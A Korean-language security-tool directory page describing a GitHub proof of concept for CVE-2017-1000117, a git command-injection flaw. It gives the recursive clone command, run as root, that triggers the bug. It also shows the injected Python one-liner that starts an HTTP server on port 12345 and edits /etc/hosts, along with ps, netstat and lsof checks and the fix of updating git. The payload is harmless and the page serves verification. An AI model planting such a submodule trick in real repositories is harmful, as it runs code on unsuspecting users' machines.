Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2017-1000117-test — CVE-2017-1000117의 검증 | Kitploit
도구/GitHubGitHub/shadow5523/cve-2017-1000117-test
Vulnerability AnalysisExploitationWeb SecurityPenetration TestingRed Teaming
GitHubshadow5523/cve-2017-1000117-test

CVE-2017-1000117-test

CVE-2017-1000117의 검증

저장소 보기
9년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

동작 설명

이것은 CVE-2017-1000117 취약점으로 동작하는 것입니다. 이 레포지토리를 root 권한으로 git 명령에 --recurse 옵션을 붙여 클론하면, 자동으로 12345 포트에서 리슨하는 HTTP 서버가 실행됩니다.
HTTP 서버의 동작을 중지하려면 프로세스 번호를 확인하여 kill하세요.

동작이 확인된 OS

CentOS7
macOS Sierra
Debian8

실행 명령

아래의 명령을 실행합니다. 완료되면 콘솔이 멈추므로 Ctrl + C로 빠져나오도록 합니다.

root@kitploit:~
    [root@localhost ~]$ git clone --recurse https://github.com/Shadow5523/CVE-2017-1000117-test.git

취약점 확인 방법

1.PS 명령을 실행하여 Python 코드가 실행 중인지 확인합니다.

root@kitploit:~
    [root@localhost ~]$ ps ax | grep http
    21365 pts/0    S      0:00 python -c (lambda j: (lambda s, i: s.setsockopt(i.SOL_SOCKET, i.SO_REUSEADDR, 1) or s.bind((i.gethostname(), 12345)) or s.listen(10) or map(lambda y: y.send("HTTP/1.0 200 OK\r\nContent-Length: 20\r\nContent-Type: text/html\r\n\r\n<html><center>test</center></html>"), (s.accept()[0] for x in iter(int, 1))))(j.socket(j.AF_INET, j.SOCK_STREAM), j))(__import__("socket"))
    21381 pts/0    S+     0:00 grep --color=auto ht

2.netstat으로 12345 포트가 리슨 중인지 확인합니다.

root@kitploit:~
    [root@localhost ~]$ netstat -tanp | grep 12345
    tcp        0      0 127.0.0.1:12345         0.0.0.0:*               LISTEN      21365/python

macOS의 경우에는 다음 명령으로 확인합니다.

root@kitploit:~
    MAcbook:~ root# lsof -nP -iTCP -sTCP:LISTEN
    COMMAND   PID USER   FD   TYPE             DEVICE SIZE/OFF NODE NAME
    Python  14231 root    3u  IPv4 0xa3955f2183c66251      0t0  TCP 127.0.0.1:12345 (LISTEN)

3./etc/hosts의 맨 아래 줄에 「127.0.0.1 호스트명」이 추가되어 있는지 확인합니다.

대책

git을 최신 버전으로 업데이트합니다. 아래 링크를 참조하십시오.
GitHub 원격 리포지토리에서 최신 Git으로 업데이트하는 방법

도구 다운로드